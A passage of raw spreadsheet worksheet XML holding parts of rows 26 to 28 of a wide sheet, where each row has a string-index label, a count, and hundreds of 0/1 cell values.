      <c r="QE26">
        <v>0</v>
      </c>
      <c r="QF26">
        <v>0</v>
      </c>
      <c r="QG26">
        <v>0</v>
      </c>
      <c r="QH26">
        <v>0</v>
      </c>
      <c r="QI26">
        <v>0</v>
      </c>
      <c r="QJ26">
        <v>0</v>
      </c>
      <c r="QK26">
        <v>0</v>
      </c>
      <c r="QL26">
        <v>0</v>
      </c>
      <c r="QM26">
        <v>0</v>
      </c>
      <c r="QN26">
        <v>0</v>
      </c>
      <c r="QO26">
        <v>0</v>
      </c>
      <c r="QP26">
        <v>0</v>
      </c>
      <c r="QQ26">
        <v>0</v>
      </c>
      <c r="QR26">
        <v>0</v>
      </c>
      <c r="QS26">
        <v>0</v>
      </c>
      <c r="QT26">
        <v>0</v>
      </c>
      <c r="QU26">
        <v>0</v>
      </c>
      <c r="QV26">
        <v>0</v>
      </c>
      <c r="QW26">
        <v>0</v>
      </c>
      <c r="QX26">
        <v>0</v>
      </c>
      <c r="QY26">
        <v>0</v>
      </c>
      <c r="QZ26">
        <v>0</v>
      </c>
      <c r="RA26">
        <v>0</v>
      </c>
      <c r="RB26">
        <v>0</v>
      </c>
      <c r="RC26">
        <v>0</v>
      </c>
      <c r="RD26">
        <v>0</v>
      </c>
      <c r="RE26">
        <v>0</v>
      </c>
      <c r="RF26">
        <v>0</v>
      </c>
      <c r="RG26">
        <v>0</v>
      </c>
      <c r="RH26">
        <v>0</v>
      </c>
      <c r="RI26">
        <v>0</v>
      </c>
      <c r="RJ26">
        <v>0</v>
      </c>
      <c r="RK26">
        <v>0</v>
      </c>
      <c r="RL26">
        <v>0</v>
      </c>
      <c r="RM26">
        <v>1</v>
      </c>
      <c r="RN26">
        <v>0</v>
      </c>
      <c r="RO26">
        <v>0</v>
      </c>
      <c r="RP26">
        <v>0</v>
      </c>
      <c r="RQ26">
        <v>0</v>
      </c>
      <c r="RR26">
        <v>0</v>
      </c>
      <c r="RS26">
        <v>0</v>
      </c>
      <c r="RT26">
        <v>0</v>
      </c>
      <c r="RU26">
        <v>0</v>
      </c>
      <c r="RV26">
        <v>0</v>
      </c>
      <c r="RW26">
        <v>0</v>
      </c>
      <c r="RX26">
        <v>0</v>
      </c>
      <c r="RY26">
        <v>0</v>
      </c>
      <c r="RZ26">
        <v>0</v>
      </c>
      <c r="SA26">
        <v>0</v>
      </c>
    </row>
    <row r="27" spans="1:495" x14ac:dyDescent="0.2">
      <c r="A27" s="6" t="s">
        <v>2695</v>
      </c>
      <c r="B27">
        <v>28</v>
      </c>
      <c r="C27">
        <v>0</v>
      </c>
      <c r="D27">
        <v>0</v>
      </c>
      <c r="E27">
        <v>0</v>
      </c>
      <c r="F27">
        <v>0</v>
      </c>
      <c r="G27">
        <v>0</v>
      </c>
      <c r="H27">
        <v>0</v>
      </c>
      <c r="I27">
        <v>0</v>
      </c>
      <c r="J27">
        <v>0</v>
      </c>
      <c r="K27">
        <v>0</v>
      </c>
      <c r="L27">
        <v>0</v>
      </c>
      <c r="M27">
        <v>0</v>
      </c>
      <c r="N27">
        <v>0</v>
      </c>
      <c r="O27">
        <v>0</v>
      </c>
      <c r="P27">
        <v>1</v>
      </c>
      <c r="Q27">
        <v>0</v>
      </c>
      <c r="R27">
        <v>0</v>
      </c>
      <c r="S27">
        <v>0</v>
      </c>
      <c r="T27">
        <v>0</v>
      </c>
      <c r="U27">
        <v>0</v>
      </c>
      <c r="V27">
        <v>0</v>
      </c>
      <c r="W27">
        <v>1</v>
      </c>
      <c r="X27">
        <v>0</v>
      </c>
      <c r="Y27">
        <v>0</v>
      </c>
      <c r="Z27">
        <v>0</v>
      </c>
      <c r="AA27">
        <v>0</v>
      </c>
      <c r="AB27">
        <v>0</v>
      </c>
      <c r="AC27">
        <v>0</v>
      </c>
      <c r="AD27">
        <v>0</v>
      </c>
      <c r="AE27">
        <v>0</v>
      </c>
      <c r="AF27">
        <v>0</v>
      </c>
      <c r="AG27">
        <v>0</v>
      </c>
      <c r="AH27">
        <v>0</v>
      </c>
      <c r="AI27">
        <v>0</v>
      </c>
      <c r="AJ27">
        <v>0</v>
      </c>
      <c r="AK27">
        <v>0</v>
      </c>
      <c r="AL27">
        <v>0</v>
      </c>
      <c r="AM27">
        <v>0</v>
      </c>
      <c r="AN27">
        <v>1</v>
      </c>
      <c r="AO27">
        <v>0</v>
      </c>
      <c r="AP27">
        <v>0</v>
      </c>
      <c r="AQ27">
        <v>0</v>
      </c>
      <c r="AR27">
        <v>0</v>
      </c>
      <c r="AS27">
        <v>0</v>
      </c>
      <c r="AT27">
        <v>0</v>
      </c>
      <c r="AU27">
        <v>0</v>
      </c>
      <c r="AV27">
        <v>0</v>
      </c>
      <c r="AW27">
        <v>0</v>
      </c>
      <c r="AX27">
        <v>0</v>
      </c>
      <c r="AY27">
        <v>0</v>
      </c>
      <c r="AZ27">
        <v>0</v>
      </c>
      <c r="BA27">
        <v>0</v>
      </c>
      <c r="BB27">
        <v>0</v>
      </c>
      <c r="BC27">
        <v>0</v>
      </c>
      <c r="BD27">
        <v>0</v>
      </c>
      <c r="BE27">
        <v>0</v>
      </c>
      <c r="BF27">
        <v>0</v>
      </c>
      <c r="BG27">
        <v>0</v>
      </c>
      <c r="BH27">
        <v>0</v>
      </c>
      <c r="BI27">
        <v>0</v>
      </c>
      <c r="BJ27">
        <v>0</v>
      </c>
      <c r="BK27">
        <v>0</v>
      </c>
      <c r="BL27">
        <v>0</v>
      </c>
      <c r="BM27">
        <v>0</v>
      </c>
      <c r="BN27">
        <v>0</v>
      </c>
      <c r="BO27">
        <v>0</v>
      </c>
      <c r="BP27">
        <v>0</v>
      </c>
      <c r="BQ27">
        <v>0</v>
      </c>
      <c r="BR27">
        <v>0</v>
      </c>
      <c r="BS27">
        <v>0</v>
      </c>
      <c r="BT27">
        <v>0</v>
      </c>
      <c r="BU27">
        <v>0</v>
      </c>
      <c r="BV27">
        <v>0</v>
      </c>
      <c r="BW27">
        <v>0</v>
      </c>
      <c r="BX27">
        <v>0</v>
      </c>
      <c r="BY27">
        <v>0</v>
      </c>
      <c r="BZ27">
        <v>0</v>
      </c>
      <c r="CA27">
        <v>0</v>
      </c>
      <c r="CB27">
        <v>1</v>
      </c>
      <c r="CC27">
        <v>0</v>
      </c>
      <c r="CD27">
        <v>0</v>
      </c>
      <c r="CE27">
        <v>0</v>
      </c>
      <c r="CF27">
        <v>0</v>
      </c>
      <c r="CG27">
        <v>0</v>
      </c>
      <c r="CH27">
        <v>0</v>
      </c>
      <c r="CI27">
        <v>0</v>
      </c>
      <c r="CJ27">
        <v>0</v>
      </c>
      <c r="CK27">
        <v>1</v>
      </c>
      <c r="CL27">
        <v>0</v>
      </c>
      <c r="CM27">
        <v>0</v>
      </c>
      <c r="CN27">
        <v>0</v>
      </c>
      <c r="CO27">
        <v>0</v>
      </c>
      <c r="CP27">
        <v>0</v>
      </c>
      <c r="CQ27">
        <v>0</v>
      </c>
      <c r="CR27">
        <v>0</v>
      </c>
      <c r="CS27">
        <v>0</v>
      </c>
      <c r="CT27">
        <v>0</v>
      </c>
      <c r="CU27">
        <v>0</v>
      </c>
      <c r="CV27">
        <v>0</v>
      </c>
      <c r="CW27">
        <v>0</v>
      </c>
      <c r="CX27">
        <v>0</v>
      </c>
      <c r="CY27">
        <v>0</v>
      </c>
      <c r="CZ27">
        <v>0</v>
      </c>
      <c r="DA27">
        <v>0</v>
      </c>
      <c r="DB27">
        <v>0</v>
      </c>
      <c r="DC27">
        <v>0</v>
      </c>
      <c r="DD27">
        <v>0</v>
      </c>
      <c r="DE27">
        <v>0</v>
      </c>
      <c r="DF27">
        <v>0</v>
      </c>
      <c r="DG27">
        <v>0</v>
      </c>
      <c r="DH27">
        <v>0</v>
      </c>
      <c r="DI27">
        <v>0</v>
      </c>
      <c r="DJ27">
        <v>0</v>
      </c>
      <c r="DK27">
        <v>0</v>
      </c>
      <c r="DL27">
        <v>0</v>
      </c>
      <c r="DM27">
        <v>0</v>
      </c>
      <c r="DN27">
        <v>0</v>
      </c>
      <c r="DO27">
        <v>0</v>
      </c>
      <c r="DP27">
        <v>0</v>
      </c>
      <c r="DQ27">
        <v>0</v>
      </c>
      <c r="DR27">
        <v>0</v>
      </c>
      <c r="DS27">
        <v>0</v>
      </c>
      <c r="DT27">
        <v>0</v>
      </c>
      <c r="DU27">
        <v>0</v>
      </c>
      <c r="DV27">
        <v>0</v>
      </c>
      <c r="DW27">
        <v>0</v>
      </c>
      <c r="DX27">
        <v>0</v>
      </c>
      <c r="DY27">
        <v>0</v>
      </c>
      <c r="DZ27">
        <v>0</v>
      </c>
      <c r="EA27">
        <v>0</v>
      </c>
      <c r="EB27">
        <v>0</v>
      </c>
      <c r="EC27">
        <v>0</v>
      </c>
      <c r="ED27">
        <v>0</v>
      </c>
      <c r="EE27">
        <v>0</v>
      </c>
      <c r="EF27">
        <v>0</v>
      </c>
      <c r="EG27">
        <v>0</v>
      </c>
      <c r="EH27">
        <v>0</v>
      </c>
      <c r="EI27">
        <v>0</v>
      </c>
      <c r="EJ27">
        <v>0</v>
      </c>
      <c r="EK27">
        <v>0</v>
      </c>
      <c r="EL27">
        <v>0</v>
      </c>
      <c r="EM27">
        <v>0</v>
      </c>
      <c r="EN27">
        <v>0</v>
      </c>
      <c r="EO27">
        <v>0</v>
      </c>
      <c r="EP27">
        <v>0</v>
      </c>
      <c r="EQ27">
        <v>0</v>
      </c>
      <c r="ER27">
        <v>0</v>
      </c>
      <c r="ES27">
        <v>0</v>
      </c>
      <c r="ET27">
        <v>0</v>
      </c>
      <c r="EU27">
        <v>1</v>
      </c>
      <c r="EV27">
        <v>0</v>
      </c>
      <c r="EW27">
        <v>0</v>
      </c>
      <c r="EX27">
        <v>0</v>
      </c>
      <c r="EY27">
        <v>0</v>
      </c>
      <c r="EZ27">
        <v>0</v>
      </c>
      <c r="FA27">
        <v>0</v>
      </c>
      <c r="FB27">
        <v>0</v>
      </c>
      <c r="FC27">
        <v>0</v>
      </c>
      <c r="FD27">
        <v>0</v>
      </c>
      <c r="FE27">
        <v>0</v>
      </c>
      <c r="FF27">
        <v>0</v>
      </c>
      <c r="FG27">
        <v>0</v>
      </c>
      <c r="FH27">
        <v>0</v>
      </c>
      <c r="FI27">
        <v>0</v>
      </c>
      <c r="FJ27">
        <v>0</v>
      </c>
      <c r="FK27">
        <v>0</v>
      </c>
      <c r="FL27">
        <v>0</v>
      </c>
      <c r="FM27">
        <v>0</v>
      </c>
      <c r="FN27">
        <v>0</v>
      </c>
      <c r="FO27">
        <v>0</v>
      </c>
      <c r="FP27">
        <v>0</v>
      </c>
      <c r="FQ27">
        <v>0</v>
      </c>
      <c r="FR27">
        <v>1</v>
      </c>
      <c r="FS27">
        <v>0</v>
      </c>
      <c r="FT27">
        <v>0</v>
      </c>
      <c r="FU27">
        <v>0</v>
      </c>
      <c r="FV27">
        <v>0</v>
      </c>
      <c r="FW27">
        <v>0</v>
      </c>
      <c r="FX27">
        <v>0</v>
      </c>
      <c r="FY27">
        <v>0</v>
      </c>
      <c r="FZ27">
        <v>0</v>
      </c>
      <c r="GA27">
        <v>0</v>
      </c>
      <c r="GB27">
        <v>0</v>
      </c>
      <c r="GC27">
        <v>0</v>
      </c>
      <c r="GD27">
        <v>0</v>
      </c>
      <c r="GE27">
        <v>0</v>
      </c>
      <c r="GF27">
        <v>1</v>
      </c>
      <c r="GG27">
        <v>0</v>
      </c>
      <c r="GH27">
        <v>0</v>
      </c>
      <c r="GI27">
        <v>0</v>
      </c>
      <c r="GJ27">
        <v>0</v>
      </c>
      <c r="GK27">
        <v>0</v>
      </c>
      <c r="GL27">
        <v>0</v>
      </c>
      <c r="GM27">
        <v>0</v>
      </c>
      <c r="GN27">
        <v>0</v>
      </c>
      <c r="GO27">
        <v>0</v>
      </c>
      <c r="GP27">
        <v>0</v>
      </c>
      <c r="GQ27">
        <v>0</v>
      </c>
      <c r="GR27">
        <v>0</v>
      </c>
      <c r="GS27">
        <v>0</v>
      </c>
      <c r="GT27">
        <v>0</v>
      </c>
      <c r="GU27">
        <v>0</v>
      </c>
      <c r="GV27">
        <v>0</v>
      </c>
      <c r="GW27">
        <v>0</v>
      </c>
      <c r="GX27">
        <v>0</v>
      </c>
      <c r="GY27">
        <v>0</v>
      </c>
      <c r="GZ27">
        <v>0</v>
      </c>
      <c r="HA27">
        <v>0</v>
      </c>
      <c r="HB27">
        <v>0</v>
      </c>
      <c r="HC27">
        <v>0</v>
      </c>
      <c r="HD27">
        <v>0</v>
      </c>
      <c r="HE27">
        <v>0</v>
      </c>
      <c r="HF27">
        <v>0</v>
      </c>
      <c r="HG27">
        <v>1</v>
      </c>
      <c r="HH27">
        <v>0</v>
      </c>
      <c r="HI27">
        <v>0</v>
      </c>
      <c r="HJ27">
        <v>0</v>
      </c>
      <c r="HK27">
        <v>0</v>
      </c>
      <c r="HL27">
        <v>0</v>
      </c>
      <c r="HM27">
        <v>0</v>
      </c>
      <c r="HN27">
        <v>0</v>
      </c>
      <c r="HO27">
        <v>0</v>
      </c>
      <c r="HP27">
        <v>0</v>
      </c>
      <c r="HQ27">
        <v>0</v>
      </c>
      <c r="HR27">
        <v>0</v>
      </c>
      <c r="HS27">
        <v>1</v>
      </c>
      <c r="HT27">
        <v>0</v>
      </c>
      <c r="HU27">
        <v>0</v>
      </c>
      <c r="HV27">
        <v>0</v>
      </c>
      <c r="HW27">
        <v>0</v>
      </c>
      <c r="HX27">
        <v>0</v>
      </c>
      <c r="HY27">
        <v>0</v>
      </c>
      <c r="HZ27">
        <v>0</v>
      </c>
      <c r="IA27">
        <v>0</v>
      </c>
      <c r="IB27">
        <v>0</v>
      </c>
      <c r="IC27">
        <v>1</v>
      </c>
      <c r="ID27">
        <v>1</v>
      </c>
      <c r="IE27">
        <v>0</v>
      </c>
      <c r="IF27">
        <v>0</v>
      </c>
      <c r="IG27">
        <v>0</v>
      </c>
      <c r="IH27">
        <v>0</v>
      </c>
      <c r="II27">
        <v>0</v>
      </c>
      <c r="IJ27">
        <v>0</v>
      </c>
      <c r="IK27">
        <v>0</v>
      </c>
      <c r="IL27">
        <v>0</v>
      </c>
      <c r="IM27">
        <v>0</v>
      </c>
      <c r="IN27">
        <v>0</v>
      </c>
      <c r="IO27">
        <v>0</v>
      </c>
      <c r="IP27">
        <v>0</v>
      </c>
      <c r="IQ27">
        <v>0</v>
      </c>
      <c r="IR27">
        <v>0</v>
      </c>
      <c r="IS27">
        <v>0</v>
      </c>
      <c r="IT27">
        <v>0</v>
      </c>
      <c r="IU27">
        <v>1</v>
      </c>
      <c r="IV27">
        <v>0</v>
      </c>
      <c r="IW27">
        <v>0</v>
      </c>
      <c r="IX27">
        <v>0</v>
      </c>
      <c r="IY27">
        <v>0</v>
      </c>
      <c r="IZ27">
        <v>0</v>
      </c>
      <c r="JA27">
        <v>0</v>
      </c>
      <c r="JB27">
        <v>0</v>
      </c>
      <c r="JC27">
        <v>0</v>
      </c>
      <c r="JD27">
        <v>0</v>
      </c>
      <c r="JE27">
        <v>0</v>
      </c>
      <c r="JF27">
        <v>0</v>
      </c>
      <c r="JG27">
        <v>0</v>
      </c>
      <c r="JH27">
        <v>0</v>
      </c>
      <c r="JI27">
        <v>0</v>
      </c>
      <c r="JJ27">
        <v>0</v>
      </c>
      <c r="JK27">
        <v>0</v>
      </c>
      <c r="JL27">
        <v>0</v>
      </c>
      <c r="JM27">
        <v>0</v>
      </c>
      <c r="JN27">
        <v>0</v>
      </c>
      <c r="JO27">
        <v>0</v>
      </c>
      <c r="JP27">
        <v>0</v>
      </c>
      <c r="JQ27">
        <v>0</v>
      </c>
      <c r="JR27">
        <v>0</v>
      </c>
      <c r="JS27">
        <v>0</v>
      </c>
      <c r="JT27">
        <v>0</v>
      </c>
      <c r="JU27">
        <v>0</v>
      </c>
      <c r="JV27">
        <v>0</v>
      </c>
      <c r="JW27">
        <v>0</v>
      </c>
      <c r="JX27">
        <v>0</v>
      </c>
      <c r="JY27">
        <v>0</v>
      </c>
      <c r="JZ27">
        <v>0</v>
      </c>
      <c r="KA27">
        <v>0</v>
      </c>
      <c r="KB27">
        <v>0</v>
      </c>
      <c r="KC27">
        <v>0</v>
      </c>
      <c r="KD27">
        <v>0</v>
      </c>
      <c r="KE27">
        <v>0</v>
      </c>
      <c r="KF27">
        <v>0</v>
      </c>
      <c r="KG27">
        <v>0</v>
      </c>
      <c r="KH27">
        <v>0</v>
      </c>
      <c r="KI27">
        <v>0</v>
      </c>
      <c r="KJ27">
        <v>0</v>
      </c>
      <c r="KK27">
        <v>0</v>
      </c>
      <c r="KL27">
        <v>0</v>
      </c>
      <c r="KM27">
        <v>0</v>
      </c>
      <c r="KN27">
        <v>0</v>
      </c>
      <c r="KO27">
        <v>0</v>
      </c>
      <c r="KP27">
        <v>0</v>
      </c>
      <c r="KQ27">
        <v>0</v>
      </c>
      <c r="KR27">
        <v>0</v>
      </c>
      <c r="KS27">
        <v>0</v>
      </c>
      <c r="KT27">
        <v>1</v>
      </c>
      <c r="KU27">
        <v>0</v>
      </c>
      <c r="KV27">
        <v>0</v>
      </c>
      <c r="KW27">
        <v>0</v>
      </c>
      <c r="KX27">
        <v>1</v>
      </c>
      <c r="KY27">
        <v>0</v>
      </c>
      <c r="KZ27">
        <v>0</v>
      </c>
      <c r="LA27">
        <v>0</v>
      </c>
      <c r="LB27">
        <v>0</v>
      </c>
      <c r="LC27">
        <v>0</v>
      </c>
      <c r="LD27">
        <v>0</v>
      </c>
      <c r="LE27">
        <v>0</v>
      </c>
      <c r="LF27">
        <v>1</v>
      </c>
      <c r="LG27">
        <v>0</v>
      </c>
      <c r="LH27">
        <v>0</v>
      </c>
      <c r="LI27">
        <v>0</v>
      </c>
      <c r="LJ27">
        <v>0</v>
      </c>
      <c r="LK27">
        <v>0</v>
      </c>
      <c r="LL27">
        <v>0</v>
      </c>
      <c r="LM27">
        <v>0</v>
      </c>
      <c r="LN27">
        <v>0</v>
      </c>
      <c r="LO27">
        <v>0</v>
      </c>
      <c r="LP27">
        <v>0</v>
      </c>
      <c r="LQ27">
        <v>0</v>
      </c>
      <c r="LR27">
        <v>0</v>
      </c>
      <c r="LS27">
        <v>0</v>
      </c>
      <c r="LT27">
        <v>0</v>
      </c>
      <c r="LU27">
        <v>0</v>
      </c>
      <c r="LV27">
        <v>0</v>
      </c>
      <c r="LW27">
        <v>1</v>
      </c>
      <c r="LX27">
        <v>0</v>
      </c>
      <c r="LY27">
        <v>0</v>
      </c>
      <c r="LZ27">
        <v>1</v>
      </c>
      <c r="MA27">
        <v>0</v>
      </c>
      <c r="MB27">
        <v>0</v>
      </c>
      <c r="MC27">
        <v>0</v>
      </c>
      <c r="MD27">
        <v>0</v>
      </c>
      <c r="ME27">
        <v>0</v>
      </c>
      <c r="MF27">
        <v>0</v>
      </c>
      <c r="MG27">
        <v>0</v>
      </c>
      <c r="MH27">
        <v>0</v>
      </c>
      <c r="MI27">
        <v>0</v>
      </c>
      <c r="MJ27">
        <v>0</v>
      </c>
      <c r="MK27">
        <v>0</v>
      </c>
      <c r="ML27">
        <v>0</v>
      </c>
      <c r="MM27">
        <v>0</v>
      </c>
      <c r="MN27">
        <v>0</v>
      </c>
      <c r="MO27">
        <v>0</v>
      </c>
      <c r="MP27">
        <v>0</v>
      </c>
      <c r="MQ27">
        <v>0</v>
      </c>
      <c r="MR27">
        <v>0</v>
      </c>
      <c r="MS27">
        <v>1</v>
      </c>
      <c r="MT27">
        <v>0</v>
      </c>
      <c r="MU27">
        <v>0</v>
      </c>
      <c r="MV27">
        <v>0</v>
      </c>
      <c r="MW27">
        <v>0</v>
      </c>
      <c r="MX27">
        <v>0</v>
      </c>
      <c r="MY27">
        <v>0</v>
      </c>
      <c r="MZ27">
        <v>0</v>
      </c>
      <c r="NA27">
        <v>0</v>
      </c>
      <c r="NB27">
        <v>0</v>
      </c>
      <c r="NC27">
        <v>0</v>
      </c>
      <c r="ND27">
        <v>0</v>
      </c>
      <c r="NE27">
        <v>0</v>
      </c>
      <c r="NF27">
        <v>0</v>
      </c>
      <c r="NG27">
        <v>0</v>
      </c>
      <c r="NH27">
        <v>0</v>
      </c>
      <c r="NI27">
        <v>0</v>
      </c>
      <c r="NJ27">
        <v>0</v>
      </c>
      <c r="NK27">
        <v>0</v>
      </c>
      <c r="NL27">
        <v>0</v>
      </c>
      <c r="NM27">
        <v>0</v>
      </c>
      <c r="NN27">
        <v>0</v>
      </c>
      <c r="NO27">
        <v>0</v>
      </c>
      <c r="NP27">
        <v>0</v>
      </c>
      <c r="NQ27">
        <v>0</v>
      </c>
      <c r="NR27">
        <v>0</v>
      </c>
      <c r="NS27">
        <v>0</v>
      </c>
      <c r="NT27">
        <v>0</v>
      </c>
      <c r="NU27">
        <v>0</v>
      </c>
      <c r="NV27">
        <v>0</v>
      </c>
      <c r="NW27">
        <v>0</v>
      </c>
      <c r="NX27">
        <v>0</v>
      </c>
      <c r="NY27">
        <v>1</v>
      </c>
      <c r="NZ27">
        <v>0</v>
      </c>
      <c r="OA27">
        <v>0</v>
      </c>
      <c r="OB27">
        <v>0</v>
      </c>
      <c r="OC27">
        <v>0</v>
      </c>
      <c r="OD27">
        <v>0</v>
      </c>
      <c r="OE27">
        <v>0</v>
      </c>
      <c r="OF27">
        <v>0</v>
      </c>
      <c r="OG27">
        <v>0</v>
      </c>
      <c r="OH27">
        <v>0</v>
      </c>
      <c r="OI27">
        <v>0</v>
      </c>
      <c r="OJ27">
        <v>0</v>
      </c>
      <c r="OK27">
        <v>0</v>
      </c>
      <c r="OL27">
        <v>1</v>
      </c>
      <c r="OM27">
        <v>0</v>
      </c>
      <c r="ON27">
        <v>0</v>
      </c>
      <c r="OO27">
        <v>0</v>
      </c>
      <c r="OP27">
        <v>0</v>
      </c>
      <c r="OQ27">
        <v>1</v>
      </c>
      <c r="OR27">
        <v>0</v>
      </c>
      <c r="OS27">
        <v>0</v>
      </c>
      <c r="OT27">
        <v>0</v>
      </c>
      <c r="OU27">
        <v>0</v>
      </c>
      <c r="OV27">
        <v>0</v>
      </c>
      <c r="OW27">
        <v>0</v>
      </c>
      <c r="OX27">
        <v>0</v>
      </c>
      <c r="OY27">
        <v>0</v>
      </c>
      <c r="OZ27">
        <v>0</v>
      </c>
      <c r="PA27">
        <v>1</v>
      </c>
      <c r="PB27">
        <v>0</v>
      </c>
      <c r="PC27">
        <v>0</v>
      </c>
      <c r="PD27">
        <v>0</v>
      </c>
      <c r="PE27">
        <v>0</v>
      </c>
      <c r="PF27">
        <v>0</v>
      </c>
      <c r="PG27">
        <v>0</v>
      </c>
      <c r="PH27">
        <v>0</v>
      </c>
      <c r="PI27">
        <v>0</v>
      </c>
      <c r="PJ27">
        <v>0</v>
      </c>
      <c r="PK27">
        <v>0</v>
      </c>
      <c r="PL27">
        <v>0</v>
      </c>
      <c r="PM27">
        <v>1</v>
      </c>
      <c r="PN27">
        <v>0</v>
      </c>
      <c r="PO27">
        <v>0</v>
      </c>
      <c r="PP27">
        <v>0</v>
      </c>
      <c r="PQ27">
        <v>0</v>
      </c>
      <c r="PR27">
        <v>0</v>
      </c>
      <c r="PS27">
        <v>0</v>
      </c>
      <c r="PT27">
        <v>1</v>
      </c>
      <c r="PU27">
        <v>1</v>
      </c>
      <c r="PV27">
        <v>0</v>
      </c>
      <c r="PW27">
        <v>0</v>
      </c>
      <c r="PX27">
        <v>0</v>
      </c>
      <c r="PY27">
        <v>0</v>
      </c>
      <c r="PZ27">
        <v>0</v>
      </c>
      <c r="QA27">
        <v>0</v>
      </c>
      <c r="QB27">
        <v>0</v>
      </c>
      <c r="QC27">
        <v>0</v>
      </c>
      <c r="QD27">
        <v>0</v>
      </c>
      <c r="QE27">
        <v>0</v>
      </c>
      <c r="QF27">
        <v>0</v>
      </c>
      <c r="QG27">
        <v>1</v>
      </c>
      <c r="QH27">
        <v>0</v>
      </c>
      <c r="QI27">
        <v>0</v>
      </c>
      <c r="QJ27">
        <v>0</v>
      </c>
      <c r="QK27">
        <v>0</v>
      </c>
      <c r="QL27">
        <v>0</v>
      </c>
      <c r="QM27">
        <v>0</v>
      </c>
      <c r="QN27">
        <v>0</v>
      </c>
      <c r="QO27">
        <v>0</v>
      </c>
      <c r="QP27">
        <v>0</v>
      </c>
      <c r="QQ27">
        <v>0</v>
      </c>
      <c r="QR27">
        <v>0</v>
      </c>
      <c r="QS27">
        <v>1</v>
      </c>
      <c r="QT27">
        <v>0</v>
      </c>
      <c r="QU27">
        <v>0</v>
      </c>
      <c r="QV27">
        <v>0</v>
      </c>
      <c r="QW27">
        <v>0</v>
      </c>
      <c r="QX27">
        <v>0</v>
      </c>
      <c r="QY27">
        <v>0</v>
      </c>
      <c r="QZ27">
        <v>0</v>
      </c>
      <c r="RA27">
        <v>0</v>
      </c>
      <c r="RB27">
        <v>0</v>
      </c>
      <c r="RC27">
        <v>0</v>
      </c>
      <c r="RD27">
        <v>0</v>
      </c>
      <c r="RE27">
        <v>0</v>
      </c>
      <c r="RF27">
        <v>0</v>
      </c>
      <c r="RG27">
        <v>0</v>
      </c>
      <c r="RH27">
        <v>0</v>
      </c>
      <c r="RI27">
        <v>0</v>
      </c>
      <c r="RJ27">
        <v>0</v>
      </c>
      <c r="RK27">
        <v>0</v>
      </c>
      <c r="RL27">
        <v>0</v>
      </c>
      <c r="RM27">
        <v>0</v>
      </c>
      <c r="RN27">
        <v>0</v>
      </c>
      <c r="RO27">
        <v>0</v>
      </c>
      <c r="RP27">
        <v>0</v>
      </c>
      <c r="RQ27">
        <v>0</v>
      </c>
      <c r="RR27">
        <v>0</v>
      </c>
      <c r="RS27">
        <v>0</v>
      </c>
      <c r="RT27">
        <v>0</v>
      </c>
      <c r="RU27">
        <v>0</v>
      </c>
      <c r="RV27">
        <v>0</v>
      </c>
      <c r="RW27">
        <v>0</v>
      </c>
      <c r="RX27">
        <v>0</v>
      </c>
      <c r="RY27">
        <v>0</v>
      </c>
      <c r="RZ27">
        <v>0</v>
      </c>
      <c r="SA27">
        <v>0</v>
      </c>
    </row>
    <row r="28" spans="1:495" x14ac:dyDescent="0.2">
      <c r="A28" s="6" t="s">
        <v>2701</v>
      </c>
      <c r="B28">
        <v>13</v>
      </c>
      <c r="C28">
        <v>0</v>
      </c>
      <c r="D28">
        <v>0</v>
      </c>
      <c r="E28">
        <v>0</v>
      </c>
      <c r="F28">
        <v>0</v>
      </c>
      <c r="G28">
        <v>0</v>
      </c>
      <c r="H28">
        <v>0</v>
      </c>
      <c r="I28">
        <v>0</v>
      </c>
      <c r="J28">
        <v>0</v>
      </c>
      <c r="K28">
        <v>0</v>
      </c>
      <c r="L28">
        <v>0</v>
      </c>
      <c r="M28">
        <v>0</v>
      </c>
      <c r="N28">
        <v>0</v>
      </c>
      <c r="O28">
        <v>0</v>
      </c>
      <c r="P28">
        <v>1</v>
      </c>
      <c r="Q28">
        <v>0</v>
      </c>
      <c r="R28">
        <v>0</v>
      </c>
      <c r="S28">
        <v>0</v>
      </c>
      <c r="T28">
        <v>0</v>
      </c>
      <c r="U28">
        <v>0</v>
      </c>
      <c r="V28">
        <v>0</v>
      </c>
      <c r="W28">
        <v>0</v>
      </c>
      <c r="X28">
        <v>0</v>
      </c>
      <c r="Y28">
        <v>0</v>
      </c>
      <c r="Z28">
        <v>0</v>
      </c>
      <c r="AA28">
        <v>0</v>
      </c>
      <c r="AB28">
        <v>0</v>
      </c>
      <c r="AC28">
        <v>0</v>
      </c>
      <c r="AD28">
        <v>0</v>
      </c>
      <c r="AE28">
        <v>0</v>
      </c>
      <c r="AF28">
        <v>0</v>
      </c>
      <c r="AG28">
        <v>0</v>
      </c>
      <c r="AH28">
        <v>0</v>
      </c>
      <c r="AI28">
        <v>0</v>
      </c>
      <c r="AJ28">
        <v>0</v>
      </c>
      <c r="AK28">
        <v>0</v>
      </c>
      <c r="AL28">
        <v>0</v>
      </c>
      <c r="AM28">
        <v>0</v>
      </c>
      <c r="AN28">
        <v>0</v>
      </c>
      <c r="AO28">
        <v>0</v>
      </c>
      <c r="AP28">
        <v>0</v>
      </c>
      <c r="AQ28">
        <v>0</v>
      </c>
      <c r="AR28">
        <v>0</v>
      </c>
      <c r="AS28">
        <v>0</v>
      </c>
      <c r="AT28">
        <v>0</v>
      </c>
      <c r="AU28">
        <v>0</v>
      </c>
      <c r="AV28">
        <v>0</v>
      </c>
      <c r="AW28">
        <v>0</v>
      </c>
      <c r="AX28">
        <v>0</v>
      </c>
      <c r="AY28">
        <v>0</v>
      </c>
      <c r="AZ28">
        <v>0</v>
      </c>
      <c r="BA28">
        <v>0</v>
      </c>
      <c r="BB28">
        <v>0</v>
      </c>
      <c r="BC28">
        <v>0</v>
      </c>
      <c r="BD28">
        <v>0</v>
      </c>
      <c r="BE28">
        <v>0</v>
      </c>
      <c r="BF28">
        <v>0</v>
      </c>
      <c r="BG28">
        <v>0</v>
      </c>
      <c r="BH28">
        <v>0</v>
      </c>
      <c r="BI28">
        <v>0</v>
      </c>
      <c r="BJ28">
        <v>0</v>
      </c>
      <c r="BK28">
        <v>0</v>
      </c>
      <c r="BL28">
        <v>0</v>
      </c>
      <c r="BM28">
        <v>0</v>
      </c>
      <c r="BN28">
        <v>0</v>
      </c>
      <c r="BO28">
        <v>0</v>
      </c>
      <c r="BP28">
        <v>0</v>
      </c>
      <c r="BQ28">
        <v>0</v>
      </c>
      <c r="BR28">
        <v>0</v>
      </c>
      <c r="BS28">
        <v>0</v>
      </c>
      <c r="BT28">
        <v>0</v>
      </c>
      <c r="BU28">
        <v>0</v>
      </c>
      <c r="BV28">
        <v>0</v>
      </c>
      <c r="BW28">
        <v>0</v>
      </c>
      <c r="BX28">
        <v>0</v>
      </c>
      <c r="BY28">
